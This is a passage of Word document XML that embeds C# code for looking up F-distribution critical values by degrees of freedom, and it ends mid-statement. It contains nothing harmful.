    <w:p w14:paraId="779BAE1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4), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A73E6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5), 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5523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6), 2.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A286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8), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E040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12), 1.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CD12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16), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2001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24), 1.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059801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50), 1.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1493CC1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51), 1.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A8BF8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A8603F"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500, 1), 3.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680F85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2), 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC54A2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3), 2.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA7FD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4), 2.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7A53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5), 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E18F7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6), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE9691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8), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71A41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12), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0252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16), 1.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8EF2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24), 1.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF0F0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50), 1.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F0B27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51), 1.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB9C82" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AFE4E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1), 3.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ECEB7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2), 3.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312697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3), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64657C6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4), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463859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5), 2.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909C95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6), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D679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8), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FB0D8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12), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A42C4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16), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76F91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24), 1.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753DEF1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50), 1.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A577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51), 1.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA51DC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB358C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1), 3.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6103C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2), 2.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB12C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3), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C578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4), 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60678E5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5), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCA2C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6), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688E94B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8), 1.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB652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12), 1.75},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21955A7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16), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD8A3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24), 1.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D004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50), 1.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1886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51), 1.00}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9B533" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>endregion</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="593935B3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CDFB82" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfAxArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new int[] { 1, 2, 3, 4, 5, 6, 8, 12, 16, 24, 50, 51 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333657C9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D27E48" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14436CD8" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B36864" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            for (int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfAxArr.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8C0EE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE6D5D" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &gt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Abs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfAxArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4648D9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1965924A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmpA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Abs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfAxArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9D242" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfAxArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F422B7" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4A02C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE17BB9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0754237B" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>int[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new int[] { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 35, 40, 45, 50, 60, 70, 80, 90, 100, 125, 150, 200, 300, 400, 500, 1000, 1001 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E1CCCC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = df;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7A80E9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB0131C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            for (int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = 0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D9CFF1" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140B484A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> &gt;= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Abs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">(df - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE0FC67" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FB3C4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>Math.Abs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">(df - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E03075" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>tableDfyArr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFD292" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2DEB41" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA6E9A4" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>neededFtableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>FTableKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resAx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E07EE" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t xml:space="preserve">            if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:t>resy</w:t>
